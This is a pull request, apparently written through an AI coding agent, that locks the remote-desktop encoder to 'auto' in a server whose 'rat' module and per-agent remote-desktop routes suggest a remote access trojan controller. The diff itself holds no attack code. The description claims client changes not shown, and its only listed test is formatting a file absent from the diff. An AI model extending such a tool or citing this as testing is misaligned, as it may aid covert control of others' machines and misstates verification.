### PR TITLE
Fix remote desktop encoder selection

### DIFF
--- a/tenvy-server/src/lib/server/rat/remote-desktop.ts
+++ b/tenvy-server/src/lib/server/rat/remote-desktop.ts
@@ -306,14 +306,9 @@ function resolveSettings(settings?: RemoteDesktopSettingsPatch): RemoteDesktopSe
 		if (typeof settings.keyboard === 'boolean') {
 			resolved.keyboard = settings.keyboard;
 		}
-		if (settings.encoder) {
-			if (!encoders.has(settings.encoder)) {
-				throw new RemoteDesktopError('Invalid encoder preference', 400);
-			}
-			resolved.encoder = settings.encoder;
-		}
-	}
-	return resolved;
+        }
+        resolved.encoder = 'auto';
+        return resolved;
 }
 
 function applySettings(target: RemoteDesktopSettings, updates: RemoteDesktopSettingsPatch) {
@@ -341,12 +336,7 @@ function applySettings(target: RemoteDesktopSettings, updates: RemoteDesktopSett
 	if (typeof updates.keyboard === 'boolean') {
 		target.keyboard = updates.keyboard;
 	}
-	if (updates.encoder) {
-		if (!encoders.has(updates.encoder)) {
-			throw new RemoteDesktopError('Invalid encoder preference', 400);
-		}
-		target.encoder = updates.encoder;
-	}
+        target.encoder = 'auto';
 }
 
 function formatEvent(event: string, payload: unknown): string {
@@ -450,7 +440,6 @@ export class RemoteDesktopManager {
                         active: true,
                         createdAt: new Date(),
                         settings: resolved,
-                        activeEncoder: resolved.encoder,
                         monitors: cloneMonitors(defaultMonitors),
                         history: [],
                         hasKeyFrame: false,
@@ -481,10 +470,7 @@ export class RemoteDesktopManager {
                         throw new RemoteDesktopError('No active remote desktop session', 404);
                 }
 		applySettings(record.settings, updates);
-		if (updates.encoder) {
-			record.activeEncoder = updates.encoder;
-		}
-		if (record.settings.monitor >= record.monitors.length) {
+                if (record.settings.monitor >= record.monitors.length) {
 			record.settings.monitor = Math.max(
 				0,
 				Math.min(record.settings.monitor, record.monitors.length - 1)

--- a/tenvy-server/src/routes/api/agents/[id]/remote-desktop/session/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/remote-desktop/session/+server.ts
@@ -26,10 +26,7 @@ function normalizeSettings(input: Record<string, unknown>): RemoteDesktopSetting
 	if (typeof input.keyboard === 'boolean') {
 		output.keyboard = input.keyboard;
 	}
-	if (typeof input.encoder === 'string') {
-		output.encoder = input.encoder as RemoteDesktopSettings['encoder'];
-	}
-	return output;
+        return output;
 }
 
 export const GET: RequestHandler = ({ params }) => {


### PR DESCRIPTION
## Summary
- derive the remote desktop clip encoder order from the negotiated codec instead of a user preference
- keep server-side remote desktop settings locked to automatic encoder selection and stop recording client overrides
- drop the encoder setting from the session settings API payload so the agent no longer receives manual overrides

## Testing
- gofmt tenvy-client/internal/modules/control/remotedesktop/stream.go

------
https://chatgpt.com/codex/tasks/task_e_68f23de1de44832b9fea16c1d603b26c